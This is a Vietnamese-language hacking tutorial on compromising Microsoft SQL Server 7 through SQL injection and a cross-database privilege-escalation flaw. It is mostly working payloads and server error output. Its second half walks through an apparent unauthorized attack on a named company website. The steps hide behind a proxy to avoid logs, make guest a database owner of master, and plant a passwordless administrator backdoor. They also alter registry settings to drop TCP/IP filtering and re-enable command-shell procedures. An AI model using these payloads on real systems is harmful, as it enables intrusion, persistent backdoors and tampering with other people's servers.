Xâm nhp máy ch Ms-Sql qua li Sql-Injection & Cross-Database
trang này đã được đọc ln
PHN I: CÁC KĨ THUT HACK TRONG SQL
• sql-injection
• convert-magic
• cross-database
PHÁT HIN LI SQL-INJECTION
http://www.company.com/product/price.asp?id=1
select price from product where id=1
http://www.company.com/product/price.asp?id=1’
select price from product where id=1’
Unclosed quotation mark before the character string ‘
http://www.company.com/product/price.asp?id=[...]
KĨ THUT CONVERT-MAGIC
http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password
select price from product where id=1 and 1=convert(int,@@version)--sp_password
Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998
21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195:
Service Pack 3)' to a column of data type int.
'sp_password' was found in the text of this event.-- The text has been replaced with this comment for
security reasons.
• @@servername, db_name(), system_user, ...
• ‘ “ ( )
LI CROSS-DATABASE CA MS-SQL
use testdatabase
create proc dbo.test as select * from master.dbo.sysxlogins
go
exec test
select * from master.dbo.sysxlogins
• sa == dbo
• db_owner có th create & design các object ca dbo
• SID ca proc dbo.test == SID ca master.dbo.sysxlogins
LI INJECTION CA MASTER..SP_MSDROPRETRY
CREATE PROCEDURE sp_MSdropretry
(@tname sysname, @pname sysname)
as
declare @retcode int
/*
** To public
*/
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
NÂNG QUYN QUA MASTER..SP_MSDROPRETRY
exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test‘
drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx
• guest == db_owner ca database master
PHN 2: MINH HA HACK SQL
• Khai thác li sql-injection ti nhaxinh.com.vn
• Mt s kinh nghim khi hack SQL
LI SQL-INJECTION TI NHAXINH.COM.VN
• dùng “proxy.ia2.marketscore.com:80” ðể tránh b ghi nht kí
http://www.nhaxinh.com.vn/FullStory.asp?id=1
http://www.nhaxinh.com.vn/FullStory.asp?id=1’
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\
XÁC ĐỊNH VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86)
Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0
(Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH SERVER_NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a
column of data type int.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a
column of data type int.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?
id=1 and 1=convert(int,system_user)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a
column of data type int.
/Including/general.asp, line 840
• user_name(): các member ca “sysadmin” được map sang “dbo”
XÁC ĐỊNH MC QUYN CA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been
denied. You must access this provider through a linked server.
/Including/general.asp, line 840
• admin đã disable openrowset/sqloledb, s enable li sau
ĐƯA GUEST VÀO DB_OWNER CA DATABASE MASTER1
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from
master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec
sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql
N'drop view dbo.test'--
• Ti sao? guest là db_owner ca database master nên guest có th thi hành xp_regwrite hoc xp_cmdshell
XÁC NHN GUEST ĐÃ NM TRONG DB_OWNER CA DATABASE MASTER CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers
where roles=0x01 and name not in('dbo')))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a
column of data type int.
/Including/general.asp, line 840
CÀI CA SAU “BUILTIN\ADMINISTRATORS”
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from
master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec
sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec
sp_executesql N'drop view dbo.test'--
• login vào database vi username là “BUILTIN\ADMINISTRATORS” mà không cn password
TI SAO KHÔNG ADD THNG USER “NHAXINH” VÀO SYSADMIN?
exec master..sp_addsrvrolemember 'nhaxinh',sysadmin
• Li: Invalid object name ‘XXXX’ khi vn tin CSDL sau này
ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LI MC QUYN CA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',R
EG_DWORD,1 exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAcc
ess',REG_DWORD,0—
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
DISABLE FIREWALL CA NT & TT LOG TRONG SQL
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'
LI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb',
'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc
xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')—
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off
master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with
override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
THÊM DÒNG “SELECT 1” ĐỂ KHC PHC LI
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb',
'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec
master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with
override')--
• set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins,...) trc tiếp, không qua các
“system-procedure”